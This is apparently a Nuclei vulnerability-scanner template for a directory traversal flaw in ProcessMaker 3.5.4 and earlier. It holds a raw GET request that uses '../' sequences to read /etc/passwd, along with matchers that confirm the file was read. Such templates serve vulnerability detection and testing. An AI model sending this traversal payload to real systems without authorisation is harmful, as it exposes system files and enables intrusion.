nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml

28 lines
495 B
YAML

id: processmaker-lfi
info:
name: ProcessMaker <= 3.5.4 Directory Traversal
author: KrE80r
severity: high
reference:
- https://www.exploit-db.com/exploits/50229
- https://www.processmaker.com
tags: processmaker,lfi
requests:
- raw:
- |
GET /../../../..//etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200